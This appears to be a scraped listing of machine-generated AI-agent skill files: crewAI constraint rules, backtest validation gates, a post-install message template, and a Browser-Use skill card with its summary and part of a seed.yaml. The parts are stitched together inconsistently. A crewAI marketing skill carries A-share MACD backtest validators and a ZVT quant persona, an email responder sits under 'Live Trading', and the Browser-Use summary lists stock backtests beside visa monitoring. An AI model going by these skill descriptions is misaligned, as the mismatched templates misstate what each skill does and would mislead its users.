      subtleties: e.g. Anthropic''s tool-use schema differs from OpenAI''s, but crewAI smooths most of it via _invoke_loop_native_tools
      — verify on your specific model versions.'
    severity: medium
    kind: domain_rule
    modality: should
    consequence: null
  - id: crewai-C-032
    when: When using Process.hierarchical for an audience or content domain whose cultural register differs from English Western-management
    action: Construct a custom manager_agent with role / goal / backstory written in the target language and cultural register.
      Do NOT pass manager_llm and rely on the auto-build path — that locks you into the en.json strings. Validate by running
      a sample kickoff and reading the manager's actual delegation prompts in the target language for register / politeness
      / clarity.
    severity: medium
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: crewai-C-033
    when: When using Process.hierarchical for any decision domain where being wrong has high downside (finance, medical, legal,
      safety-critical)
    action: (a) For decision-robustness, build a Flow with @router that fans out to 3+ agents, collects their independent
      recommendations, and a final arbiter agent (or majority vote) decides. (b) Treat hierarchical Crew as a routing convenience
      for low-stakes orchestration, not a robustness mechanism. (c) Document in your skill / wrapper that hierarchical is
      single-manager dispatch, not consensus.
    severity: high
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: crewai-C-034
    when: When sharing Memory across multiple processes or worker pods
    action: '(a) For single-process: keep lancedb default. (b) For multi-process / multi-pod: switch to Memory(storage=''qdrant'')
      (embedded edge mode) and accept the additional dependency. (c) For cloud-scale: wire an external vector DB through your
      own VectorStoreBase subclass. (d) Re-index existing memories after any storage switch — vector geometry is not portable
      across stores.'
    severity: high
    kind: domain_rule
    modality: should
    consequence: null
  - id: crewai-C-035
    when: When using kickoff_for_each / kickoff_for_each_async / akickoff_for_each for batch processing
    action: (a) Prefer pure Process.sequential for batch — it has no mutate-then-raise paths. (b) For hierarchical batch,
      construct a new Crew per input rather than reusing one across the batch. (c) If reuse is required, validate manager_agent.tools=[]
      BEFORE the batch starts so the mutate-path never fires; combine with try/except + abort-on-failure semantics so a single
      failed input does not corrupt subsequent ones.
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: crewai-C-036
    when: When deciding whether to override Memory weights for a domain whose relevance horizon you suspect differs from generic
      chat
    action: (a) Construct a holdout query set of 50-100 representative queries with ground-truth-relevant memories labeled.
      (b) Sweep half-life ∈ {7, 30, 90, 365} days and weights (recency, semantic, importance) ∈ {(0.1,0.7,0.2), (0.3,0.5,0.2),
      (0.5,0.3,0.2)}. (c) Pick the combination maximizing recall@k on your holdout. (d) Document the chosen weights and the
      holdout methodology in your skill bundle.
    severity: medium
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: crewai-C-037
    when: When auditing what crewAI sends to its telemetry endpoint and assuming share_crew=False is sufficient for compliance
    action: Treat share_crew=False as the LAYER 1 mitigation (no business-context payload) and the disable ENVs as the LAYER
      2 mitigation (no telemetry at all). For GDPR / SOC2 / data-residency compliance, you need LAYER 2; LAYER 1 alone still
      emits the deployment fingerprint. Test by tcpdump / network egress monitoring on a deployment with share_crew=False
      and the disable ENV unset — you will see OTLP traffic.
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: crewai-C-038
    when: When designing distributed agent communication and considering crewAI's a2a/ subsystem as the transport layer
    action: (a) Treat a2a/ as a placeholder for future federated topologies, not as a built-in transport. (b) For real cross-process
      communication, choose a battle-tested message broker. (c) If you do build on a2a/, expect to implement transport, retry,
      ordering, and error handling yourself. (d) Watch the crewAI repo for a2a/ implementation density before committing to
      it as the integration surface.
    severity: medium
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: crewai-C-039
    when: When deciding which AgentExecutor implementation to use for production
    action: (a) Use CrewAgentExecutor (default) for production — it is the path covered by the verified anti-pattern set (crewai-C-001
      through crewai-C-005). (b) Reserve experimental.AgentExecutor for spike branches; do not deploy to production without
      re-verifying the FATAL constraints against its specific code paths. (c) Document the choice in your skill bundle.
    severity: medium
    kind: domain_rule
    modality: should
    consequence: null
  - id: crewai-C-040
    when: When wrapping kickoff in try/except and continuing to use the same Crew instance after exception
    action: (a) On any kickoff exception, treat the Crew instance as TAINTED — discard and reconstruct from a known-good template.
      (b) Specifically validate manager_agent.tools and manager_agent.allow_delegation against your original construction
      values before reusing. (c) Do NOT assume that 'caught the exception' = 'restored the state' — the finally block does
      not restore state.
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: crewai-C-041
    when: When wanting to customize how a hierarchical manager delegates (e.g. structured payload contracts, audit logging,
      per-worker rate limits)
    action: (a) Accept the auto-attached AgentTools as fixed delegation transport. (b) Customize delegation BEHAVIOR via the
      manager_agent's role/goal/backstory and prompt template — NOT by trying to swap the delegation tools. (c) For structured
      payloads, see crewai-C-013 (string-only contract). (d) For audit logging, hook step_callback or the event_bus (see crewai-C-014
      for safe-pattern requirements).
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: crewai-C-042
    when: When wiring step_callback for any production-monitoring use case where token usage tracking matters
    action: 'Pattern: `def safe_step_callback(step): try: ... except Exception as e: logger.exception(''step_callback failed'');
      return None`. NEVER re-raise. Validate by deliberately raising in the callback during dev and confirming you still get
      a CrewOutput with valid token_usage fields (you will — but the kickoff aborts the in-progress task).'
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: crewai-C-043
    when: When constructing Agent or Task instances from old code, tutorials, or migration
    action: (a) Replace Agent.reasoning with Agent.planning_config. (b) Replace Task.max_retries with Task.guardrail_max_retries.
      (c) Audit Agent.allow_code_execution usage — read the field's deprecation docstring for its replacement (or remove if
      unused). (d) Run construction with `warnings.simplefilter('error', DeprecationWarning)` in tests to surface deprecated
      usage.
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: crewai-C-044
    when: When designing manager-to-worker payloads that must remain typed across the round-trip
    action: (a) Define a Pydantic model for each delegation payload type. (b) On the manager side, model.model_dump_json()
      to a single string field. (c) On the worker side, Pydantic.model_validate_json() with strict=True. (d) Log a checksum
      on both sides during dev to verify round-trip integrity. (e) Never trust the manager's natural-language paraphrasing
      of a structured argument.
    severity: high
    kind: domain_rule
    modality: should
    consequence: null
  - id: crewai-C-045
    when: When integrating mem0 with crewAI agents or migrating memory state between the two systems
    action: '(a) Decide explicitly which system owns persistence: mem0 for user-level long-term, crewAI Memory for within-execution
      scratch. (b) Build a thin wrapper around RememberTool / RecallMemoryTool that translates calls into mem0 add/search
      with consistent user_id+agent_id+run_id mapping (mem0 v3 syntax — see mem0-C-006). (c) Do NOT assume one''s recall semantics
      map to the other''s — mem0 has hybrid BM25 fusion, crewAI has composite recency/semantic/importance scoring.'
    severity: medium
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: crewai-C-046
    when: When deploying crewAI to short-lived runtimes (Lambda, Cloud Run, ephemeral CI runners, serverless)
    action: 'Always set CREWAI_DISABLE_TELEMETRY=true in serverless / ephemeral runtime configs (Lambda environment variables,
      Cloud Run deploy spec, GitHub Actions env block). Validate with a synthetic load test: 100 cold starts with the ENV
      set, then network egress monitor — must show zero OTLP traffic to CREWAI_TELEMETRY_BASE_URL.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: crewai-C-047
    when: When extending or customizing Agent / LiteAgent behavior beyond what the abstract interface allows
    action: (a) Override only the 6 abstract methods documented in BaseAgent. (b) Use the public surface (execute_task, aexecute_task,
      etc.) — do not reach into private helpers (anything prefixed with _ in subclasses). (c) For behavior not covered by
      the abstract surface, prefer composition (wrap the agent) over inheritance into private internals. (d) Pin the crewAI
      version explicitly in pyproject.toml when relying on any near-private behavior.
    severity: medium
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: crewai-C-048
    when: When designing Crew instance lifetime in long-running services where each kickoff should be isolated from prior
      failures
    action: (a) For each kickoff that must be isolated, run `fresh = copy.deepcopy(crew); result = fresh.kickoff(...)`. (b)
      For batch operations (kickoff_for_each), wrap each iteration in deepcopy. (c) Verify the deepcopy actually isolates
      by mutating an attribute on the fresh copy and confirming the original is unchanged (Pydantic v2 + threading sometimes
      share state via weakrefs). (d) For hierarchical mode specifically, validate manager_agent.tools and allow_delegation
      match construction values BEFORE each kickoff.
    severity: high
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: crewai-C-049
    when: When designing a workflow that involves parallel branches, conditional fan-out, event-driven listeners, or multi-Crew
      composition
    action: '(a) Map the workflow topology: pipeline → Crew(sequential); routed dispatch → Crew(hierarchical); event-driven
      / parallel / conditional → Flow. (b) For consensus / multi-Crew composition: Flow with @router fanning out to multiple
      Crews and an arbiter. (c) Read flow/__init__.py exports and the docs/en/concepts/flows.mdx (if present) before committing
      to a Crew-only design that will hit structural limits later.'
    severity: medium
    kind: domain_rule
    modality: should
    consequence: null
  - id: crewai-C-050
    when: When subscribing to crewai_event_bus events for observability, metrics, or behavioral hooks
    action: (a) Wrap every event handler body in try/except Exception → log → return None. (b) For any I/O (HTTP, database
      write), enqueue to a background worker; the handler must return in microseconds. (c) Treat the Crew instance and agent
      state as READ-ONLY in event handlers — mutations leak across kickoffs (see crewai-C-040). (d) Subscribe with the BaseEventListener
      base, not by monkey-patching crewai_event_bus.
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: crewai-C-051
    when: When wrapping kickoff in an outer try/except for application-level error handling
    action: (a) Always re-raise OR explicitly emit CrewKickoffFailedEvent yourself if you must swallow. (b) Do NOT add a finally
      block that overwrites CrewOutput state. (c) When unsure, let the framework's exception bubble up to your top-level handler
      — its event-bus emit happens BEFORE your handler runs.
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: crewai-C-052
    when: When declaring task.context dependencies explicitly (the explicit-context mitigation for crewai-C-001)
    action: 'Construct task.context as a list of actual Task objects: `task_b = Task(..., context=[task_a])` where task_a
      is a previously-constructed Task instance. Do NOT pass `context=[''task-a'']` or `context=[task_a.id]`. For dynamic
      lookups, build a dict {task.id: task} from Crew.tasks and resolve at construction time.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: crewai-C-053
    when: When dynamically building or modifying a Crew between construction and kickoff
    action: (a) Build the final task / agent list before Crew construction. (b) If you need to add tasks dynamically, construct
      a NEW Crew with the updated lists rather than appending to self.tasks on an existing instance — the validators won't
      re-run on mutation. (c) Validate dynamically-added Tasks against the structural rules manually if you must mutate (rare,
      error-prone).
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: crewai-C-054
    when: When extending or replacing ToolsHandler to track richer tool-usage history
    action: (a) If extending ToolsHandler with a history list, also patch tool_usage.py:706-716 _check_tool_repeated_usage
      to walk the history (sliding window of N, frequency check, etc.). (b) Document the new contract clearly. (c) Test by
      simulating an A→B→A→B oscillation and confirming detection fires before max_iter (the default doesn't — see crewai-C-002).
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: crewai-C-055
    when: When implementing the mitigation pattern for the FATAL tool oscillation issue (crewai-C-002)
    action: (a) Set max_usage_count on every tool reachable by an agent with >=2 tools (e.g. max_usage_count=10). (b) ADDITIONALLY
      hook step_callback to maintain a rolling window (last 4-6 tool calls) and abort if the same A→B→A→B pattern persists.
      (c) Test with a deliberately oscillating mock LLM to verify BOTH layers fire when expected. (d) Do NOT assume max_usage_count
      alone covers the FATAL case — it does not.
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: crewai-C-056
    when: When designing observability or hook architecture around crewAI Crew kickoffs and assuming framework-level callback
      safety
    action: Treat step_callback as a framework hot path with no exception isolation. Do NOT design any observability/logging
      architecture that assumes callback exceptions are caught by crewAI. Every step_callback in your codebase requires its
      own try/except wrapper. Validate by deliberately raising in a callback during dev — if the kickoff aborts, the framework
      is NOT isolating you (which is the documented behavior at this commit).
    severity: medium
    kind: domain_rule
    modality: must_not
    consequence: null
output_validator:
  assertions:
  - id: OV-01
    check_predicate: all(p in inspect.getsource(zvt.factors.algorithm.macd) for p in ['slow=26', 'fast=12', 'n=9'])
    failure_message: 'FATAL: MACD params drifted from (fast=12, slow=26, n=9) — SL-08 violation, non-reproducible signals'
    business_meaning: Standard MACD parameters are a semantic lock; drift makes results incomparable with industry-standard
      indicators and non-reproducible.
    source_ids:
    - SL-08
    - BD-036
  - id: OV-02
    check_predicate: result.get('total_trades', 0) > 0 or result.get('explicit_zero_trade_ack') is True
    failure_message: Zero trades executed — likely missing pre-fetched data (see PC-02) or over-restrictive filters
    business_meaning: A backtest with zero trades is not a valid result; either data is missing or the strategy never triggered.
      Structural non-emptiness check is insufficient — we need business confirmation.
    source_ids:
    - SL-01
    - finance-C-073
  - id: OV-03
    check_predicate: result.get('annual_return') is None or abs(float(result['annual_return'])) <= 5.0
    failure_message: 'FATAL: |annual_return| > 500% — likely look-ahead bias or data error'
    business_meaning: Annual returns exceeding 500% are physically implausible for A-share strategies; indicates look-ahead
      bias or corrupt data.
    source_ids: []
  - id: OV-04
    check_predicate: result.get('holding_change_pct') is None or abs(float(result['holding_change_pct'])) <= 1.0
    failure_message: 'FATAL: |holding_change_pct| > 100% — physically impossible'
    business_meaning: Holding change percentage cannot exceed 100%; violation indicates position accounting error.
    source_ids:
    - BD-029
  - id: OV-05
    check_predicate: result.get('max_drawdown') is None or abs(float(result['max_drawdown'])) <= 1.0
    failure_message: 'FATAL: |max_drawdown| > 100% — impossible for non-leveraged account'
    business_meaning: Maximum drawdown cannot exceed 100% without leverage; violation indicates calculation error or look-ahead
      bias.
    source_ids: []
  - id: OV-06
    check_predicate: not (hasattr(result, 'trade_log') and result.trade_log and any(result.trade_log[i].action == 'sell' and
      i+1 < len(result.trade_log) and result.trade_log[i+1].action == 'buy' and result.trade_log[i].timestamp == result.trade_log[i+1].timestamp
      for i in range(len(result.trade_log)-1)))
    failure_message: 'FATAL: buy-before-sell detected in same cycle — SL-01 violation, creates implicit leverage'
    business_meaning: SL-01 requires sell() before buy() in each cycle; violation means available_long was not updated before
      buying, risking duplicate positions.
    source_ids:
    - SL-01
  scaffold:
    validate_py_path: '{workspace}/validate.py'
    tail_block: "# === DO NOT MODIFY BELOW THIS LINE ===\nif __name__ == \"__main__\":\n    result = run_backtest()\n    from\
      \ validate import enforce_validation\n    enforce_validation(result, output_path=\"{workspace}/result.csv\")\n# ===\
      \ END DO NOT MODIFY ==="
  enforcement_protocol: 1. Never edit validate.py. 2. Never delete the DO NOT MODIFY tail block from the main script. 3. Never
    wrap enforce_validation() in try/except. 4. Never rewrite result write logic — it MUST go through enforce_validation.
    5. If validate.py raises ImportError, fix the dependency, do not remove the call.
acceptance:
  hard_gates:
  - id: G1
    check: '{workspace}/result.csv exists AND file size > 0'
    on_fail: Strategy did not produce output; check run_backtest() return value and enforce_validation() call
  - id: G2
    check: '{workspace}/result.csv.validation_passed marker file exists'
    on_fail: Validation did not complete; review validate.py output and fix assertion failures
  - id: G3
    check: 'Main script contains literal: from validate import enforce_validation'
    on_fail: Validation chain stripped; re-add the import in the DO NOT MODIFY block
  - id: G4
    check: 'Main script contains literal: # === DO NOT MODIFY BELOW THIS LINE ==='
    on_fail: Validation fence removed; regenerate DO NOT MODIFY tail block
  - id: G5
    check: 'result.csv has at least 1 row: pandas.read_csv(result.csv).shape[0] >= 1'
    on_fail: Empty result; check if trade_log is non-empty and factors generated signals. Confirm PC-02 (k-data exists) passed.
  - id: G6
    check: 'If MACD strategy: source contains ''slow=26'' AND ''fast=12'' AND ''n=9'' in algorithm call'
    on_fail: MACD params drifted from SL-08 lock; restore standard (12, 26, 9)
  - id: G7
    check: 'For data pipeline tasks: result.csv contains ''entity_id'' and ''timestamp'' fields'
    on_fail: Missing required columns; check Mixin.query_data return schema and DataFrame MultiIndex reset_index() before
      writing
  - id: G8
    check: 'OV-03 passes: abs(annual_return) <= 5.0 (500%)'
    on_fail: Physical plausibility check failed; investigate look-ahead bias or data corruption in input kdata
  soft_gates:
  - id: SG-01
    rubric: 'Strategy narrative consistency: user intent aligns with generated strategy.py logic. dim_a: signal direction
      (buy/sell) matches intent [1-5, pass>=4]; dim_b: frequency (daily/intraday) aligns [1-5, pass>=4]; dim_c: risk controls
      match user intent [1-5, pass>=4].'
  - id: SG-02
    rubric: 'Factor combination quality. dim_a: no highly correlated factor duplication [1-5, pass>=4]; dim_b: multi-period
      alignment correct [1-5, pass>=4]; dim_c: liquidity filter present for A-share [1-5, pass>=4].'
  - id: SG-03
    rubric: 'Data source selection appropriateness. dim_a: coverage sufficient for target entities [1-5, pass>=4]; dim_b:
      provider latency acceptable for strategy frequency [1-5, pass>=4]; dim_c: no unauthorized provider used without credentials
      [1-5, pass>=4].'
skill_crystallization:
  trigger: all_hard_gates_passed AND user_opt_out_skill_saving != true
  output_path_template: '{workspace}/../skills/{slug}.skill'
  slug_template: '{blueprint_id_short}-{uc_id_lower}'
  captured_fields:
  - name
  - intent_keywords
  - entry_point_script
  - validate_script
  - fatal_constraints
  - spec_locks
  - preconditions
  - install_recipes
  - human_summary_translated
  action: 'After all Hard Gates PASS, resolve slug via slug_template using the executed UC, then write the .skill YAML file
    at output_path_template. Notify user in their detected locale: ''Skill saved as {slug}.skill — next time say one of {sample_triggers}
    from the matched UC to invoke directly.'''
  violation_signal: All hard gates passed but no .skill file exists at expected path
  skill_file_schema:
    name: finance-bp-134 / Marketing Strategy Multi-agent
    version: v6.1
    intent_keywords:
    - marketing
    - strategy
    - multi-agent
    - campaign
    entry_point: run_backtest
    fatal_guards:
    - SL-01
    - SL-02
    - SL-03
    - SL-04
    - SL-05
    - SL-06
    - SL-07
    - SL-08
    - SL-10
    - SL-11
    - SL-12
    spec_locks:
    - SL-01
    - SL-02
    - SL-03
    - SL-04
    - SL-05
    - SL-06
    - SL-07
    - SL-08
    - SL-09
    - SL-10
    - SL-11
    - SL-12
    preconditions:
    - PC-01
    - PC-02
    - PC-03
    - PC-04
post_install_notice:
  trigger: skill_installation_complete
  message_template:
    positioning: I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow.
    capability_catalog:
      group_strategy:
        source: auto_grouped
        strategy_reason: auto-grouped by UC.type (4 distinct values, balanced distribution)
      groups:
      - group_id: complete_strategy
        name: Complete Strategy
        description: ''
        emoji: 📦
        uc_count: 5
        ucs:
        - uc_id: UC-001
          name: Marketing Strategy Multi-agent
          short_description: Multi-agent collaboration to plan a marketing campaign
          sample_triggers:
          - marketing
          - strategy
          - multi-agent
        - uc_id: UC-002
          name: Job Posting Generation
          short_description: Recruitment workflow automation — generate job descriptions, match candidate profiles, schedule
            follow-ups
          sample_triggers:
          - recruitment
          - jd generation
          - hiring
        - uc_id: UC-003
          name: Game Builder Crew
          short_description: Multi-agent collaborative software design + Python code generation for small games (Snake, Tetris,
            etc.)
          sample_triggers:
          - code generation
          - game development
          - multi-agent coding
        - uc_id: UC-004
          name: Match Profile to Positions
          short_description: Match a candidate CV against open positions using vector search + agent evaluation
          sample_triggers:
          - cv matching
          - vector search
          - candidate sourcing
        - uc_id: UC-005
          name: Content Creator Flow
          short_description: Multi-crew + Flow router pipeline for content production — research → outline → draft → review,
            with conditional branches
          sample_triggers:
          - content production
          - flow
          - multi-crew
      - group_id: live_trading
        name: Live Trading
        description: ''
        emoji: 📦
        uc_count: 1
        ucs:
        - uc_id: UC-006
          name: Email Auto Responder Flow
          short_description: Listen for new emails → classify intent → draft reply → auto-send (or queue for review)
          sample_triggers:
          - email
          - automation
          - monitoring
      - group_id: extension_example
        name: Extension Example
        description: ''
        emoji: 📦
        uc_count: 3
        ucs:
        - uc_id: UC-007
          name: Hierarchical Process Crew (manager_llm-routed)
          short_description: 'A canonical hierarchical pattern — manager_llm dynamically routes tasks across a heterogeneous
            pool of worker agents, each specialized to a different '
          sample_triggers:
          - manager
          - hierarchical
          - delegation
        - uc_id: UC-008
          name: Sequential Process Crew (Quickstart)
          short_description: The default CLI template — researcher → reporter two-stage sequential collaboration
          sample_triggers:
          - sequential
          - pipeline
          - research-and-report
        - uc_id: UC-009
          name: Conditional Tasks
          short_description: Branch task execution based on the output of a previous task
          sample_triggers:
          - conditional
          - branching
          - if/else task
      - group_id: data_pipeline
        name: Data Pipeline
        description: ''
        emoji: 📊
        uc_count: 1
        ucs:
        - uc_id: UC-010
          name: Async Kickoff for Each (batch / parallel)
          short_description: Run the same Crew over many input sets in parallel — batch processing, A/B input comparison,
            fleet-style automation
          sample_triggers:
          - batch
          - async
          - parallel inputs
    call_to_action: Tell me which one you want to try.
    featured_entries:
    - uc_id: UC-001
      beginner_prompt: Try marketing strategy multi-agent
      auto_selected: true
    - uc_id: UC-002
      beginner_prompt: Try job posting generation
      auto_selected: true
    - uc_id: UC-003
      beginner_prompt: Try game builder crew
      auto_selected: true
    more_info_hint: Ask me 'what else can you do?' to see all 10 capabilities.
  locale_rendering:
    instruction: On skill_installation_complete, translate ALL user-facing strings (positioning + capability_catalog.groups[].name
      + capability_catalog.groups[].description + capability_catalog.groups[].ucs[].short_description + call_to_action + featured_entries[].beginner_prompt
      + more_info_hint) into detected user locale per locale_contract. Preserve UC-IDs, group_id, emoji, and sample_triggers
      verbatim.
    preserve_verbatim:
    - UC-IDs
    - group_id
    - emoji
    - sample_triggers
    - technical_class_names
  enforcement:
    action: 'Host agent MUST send composed message to user as the FIRST user-facing response after skill_installation_complete
      event. Message MUST contain: positioning, capability_catalog (rendered as markdown tables per group), 3 featured_entries,
      call_to_action, and more_info_hint.'
    violation_code: PIN-01
    violation_signal: First user-facing message post-install does not contain the full capability_catalog (all UCs grouped)
      OR skips featured_entries OR skips call_to_action.
human_summary:
  persona: Doraemon
  what_i_can_do:
    tagline: 'I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me
      what you want; I''ll write the code, you don''t have to dig docs. (Heads up: ZVT natively supports A-share, HK, and
      crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don''t bother for serious work.)'
    use_cases:
    - Game Builder Crew
    - Job Posting Generation
    - Marketing Strategy Multi-agent
    - A-share MACD daily golden-cross backtest with hfq price adjustment from eastmoney
    - 'End-to-end ZVT pipeline: FinanceRecorder + GoodCompanyFactor + StockTrader'
    - Multi-factor strategy with TargetSelector (AND mode) combining MACD + volume breakout
    - Index composition data collection (SZ1000, SZ2000) with EM recorder
  what_i_auto_fetch:
  - ZVT stage pipeline structure (data_collection → visualization) from LATEST.yaml
  - Semantic locks (SL-01 through SL-12) — especially sell-before-buy ordering and MACD params
  - Fatal constraints (finance-C-*) relevant to your target strategy type
  - 'Default parameters: MACD(12,26,9), hfq adjustment, buy_cost=0.001, base_capital=1M CNY'
  - Entity ID format (stock_sh_600000) and DataFrame MultiIndex convention
  - Provider-specific recorder class names and required class attributes
  what_i_ask_you:
  - 'Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage
    is thin)'
  - 'Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare,
    or qmt (broker)?'
  - 'Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?'
  - 'Time range: start_timestamp and end_timestamp for backtest period'
  - 'Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?'
  locale_rendering:
    instruction: On first user contact, translate all fields above into detected user locale while preserving Doraemon persona
      (direct, frank, mildly snarky, knows limits).
    preserve_verbatim:
    - BD-IDs
    - SL-IDs
    - UC-IDs
    - finance-C-IDs
    - class_names
    - function_names
    - file_paths
    - numeric_thresholds

ClawHub Coding Data Analysis+2

T@clawhub-tangweigang-jpg-8679fec286

Browser Use Agent

Skill

Browser-Use：把 LLM 变成网页操作员的异步 Python 库（Python 3.11+）。Agent 步循环采集 DOM + 截图 → LLM 一次调用产出 thinking / evaluation / next_goal / action[] → 经 CDP 执行。 Browser-Use: a...

---
name: browser-use-agent
description: |-
  Browser-Use：把 LLM 变成网页操作员的异步 Python 库（Python 3.11+）。Agent 步循环采集 DOM + 截图 → LLM 一次调用产出 thinking / evaluation / next_goal / action[] → 经 CDP 执行。
  Browser-Use: an async Python library (3.11+) that turns an LLM into a web operator. The Agent loop collects DOM + screenshot, makes one LLM call emitting thinking / evaluation / next_goal / action[], and executes via CDP. Built on cdp-use; no Playwright.
license: MIT-0
compatibility: AI engineering knowledge skill — host AI consumes seed.yaml directly. No installation required.
metadata:
  version: "v0.1.0"
  blueprint_id: "finance-bp-133"
  blueprint_source: "browser-use/browser-use"
  blueprint_commit: "f3878b0e074a53119defe6cbc625687a1343ba8e"
  category: ai-engineering
  doramagic_url: "https://doramagic.ai/zh/crystal/browser-use-agent"
  openclaw:
    skillKey: browser-use-agent
    category: ai-engineering
    primaryEnv: knowledge
---
# 这个 skill 适合什么用户？能做哪些任务？

## 概览

Browser-Use 是把 LLM 变成网页操作员的异步 Python 库（github.com/browser-use/browser-use）。Agent 步循环：(1) 通过 14 个 watchdog 围绕 bubus.EventBus 采集 BrowserStateSummary（带数字索引的 DOM、截图、tab 列表、页面状态）；(2) 一次 LLM 调用同时产出 thinking + evaluation_previous_goal + memory + next_goal + action[]；(3) 经 CDP 原语在双层 page-change 守卫下执行动作。

CD...

**Doramagic 晶体页**: https://doramagic.ai/zh/crystal/browser-use-agent

## 知识规模

- **40 条约束** (4 fatal + 36 non-fatal)
- 上游源码: `browser-use/browser-use` @ commit `f3878b0e`
- 蓝图 ID: `finance-bp-133`

## 用法

Host AI（Claude Code / Cursor / OpenClaw）读 `references/seed.yaml`，按其中的：
- `intent_router` 匹配用户意图
- `architecture` 理解项目架构
- `constraints` 应用 anti-pattern 约束
- `business_decisions` 参考核心设计决策

## FAQ 摘要

### 这个 skill 适合什么用户？能做哪些任务？
适合做网页自动化的工程师：表单填写、信息抓取、回归测试、跨站点数据采集等。Agent 把视觉理解 + 操作规划合并到一次 LLM 调用，比传统 Playwright 脚本更适合非确定性页面。访问 doramagic.ai/r/browser-use 查看完整用例。

### 需要准备什么环境？依赖什么？
Python 3.11+，Chromium 系浏览器（local_browser_watchdog 自动启动或通过 cdp_url 接管），至少一个 LLM provider 配置（默认 ChatBrowserUse项目自家微调模型）。要求 async event loop——Agent / BrowserSession 接口是 async-native。

### 会踩哪些坑？这个 skill 怎么防护？
本 skill 内置 40 条约束（4 条 fatal）。典型踩坑：(1) alert/confirm/beforeunload 自动接受，破坏性确认（如 'Delete this'）也会通过；(2) Agent(sensitive_data=...) 不配 Browser(allowed_domains=[...]) 是 fail-OPEN（只 warning 不 raise），合规场景必须显式

---

完整文档: 见 `references/seed.yaml` (v6.1 schema). 浏览页: https://doramagic.ai/zh/crystal/browser-use-agent

FILE:human_summary.md
# finance-bp-133-v6.1 — Human Summary

**Persona**: Doraemon

> I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me what you want; I'll write the code, you don't have to dig docs. (Heads up: ZVT natively supports A-share, HK, and crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don't bother for serious work.)

## What I Can Do

- Greek MFA visa appointment monitoring
- Migros online groceries shopping + checkout (TWINT)
- Apply to a Job (Rochester Health) — auto-fill form + upload resume
- A-share MACD daily golden-cross backtest with hfq price adjustment from eastmoney
- End-to-end ZVT pipeline: FinanceRecorder + GoodCompanyFactor + StockTrader
- Multi-factor strategy with TargetSelector (AND mode) combining MACD + volume breakout
- Index composition data collection (SZ1000, SZ2000) with EM recorder

## What I Auto-Fetch

- ZVT stage pipeline structure (data_collection → visualization) from LATEST.yaml
- Semantic locks (SL-01 through SL-12) — especially sell-before-buy ordering and MACD params
- Fatal constraints (finance-C-*) relevant to your target strategy type
- Default parameters: MACD(12,26,9), hfq adjustment, buy_cost=0.001, base_capital=1M CNY
- Entity ID format (stock_sh_600000) and DataFrame MultiIndex convention
- Provider-specific recorder class names and required class attributes

## What I Ask You

- Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage is thin)
- Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare, or qmt (broker)?
- Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?
- Time range: start_timestamp and end_timestamp for backtest period
- Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?

## Locale Rendering

**Instruction**: On first user contact, translate all fields above into detected user locale while preserving Doraemon persona (direct, frank, mildly snarky, knows limits).

**Preserve verbatim**: BD-IDs, SL-IDs, UC-IDs, finance-C-IDs, class_names, function_names, file_paths, numeric_thresholds

---

*Generated by compile_crystal_skeleton.py v5.0 for finance-bp-133-v6.1*
*All content is English source — agent translates on first user contact.*
FILE:references/seed.yaml
meta:
  id: finance-bp-133-v6.1
  version: v6.1
  blueprint_id: finance-bp-133
  sop_version: crystal-compilation-v6.1
  source_language: en
  compiled_at: '2026-04-25T09:07:13.859419+00:00'
  target_host: openclaw
  authoritative_artifact:
    primary: seed.yaml
    non_authoritative_derivatives:
    - SKILL.md (host-generated summary, may lag)
    - HEARTBEAT.md (host telemetry)
    - memory/*.md (host conversational memory)
    rule: On any behavioral decision (preconditions check, OV assertion, EQ rule firing, spec_lock verification), agents MUST
      re-read seed.yaml. Derivatives are for UI display only and may be out-of-date.
  execution_protocol:
    install_trigger:
    - Execute resources.host_adapter.install_recipes[] in declared order
    - Verify each package with import check before proceeding
    execute_trigger: When user intent matches intent_router.uc_entries[].positive_terms AND user uses action verb (run/execute/跑/执行/backtest/fetch/collect)
    on_execute:
    - Reload seed.yaml (do not rely on SKILL.md or cached summaries)
    - Run preconditions[] in declared order; halt on first fatal failure with on_fail message to user
    - Enter context_state_machine.CA1_MEMORY_CHECKED state
    - Evaluate evidence_quality.enforcement_rules[]; prepend user_disclosure_template
    - Translate user_facing_fields to user locale per locale_contract
    workspace_resolution:
      scripts_path: '{host_workspace}/scripts/'
      skills_path: '{host_workspace}/skills/'
      trace_path: '{host_workspace}/.trace/'
locale_contract:
  source_language: en
  user_facing_fields:
  - human_summary.what_i_can_do.tagline
  - human_summary.what_i_can_do.use_cases[]
  - human_summary.what_i_auto_fetch[]
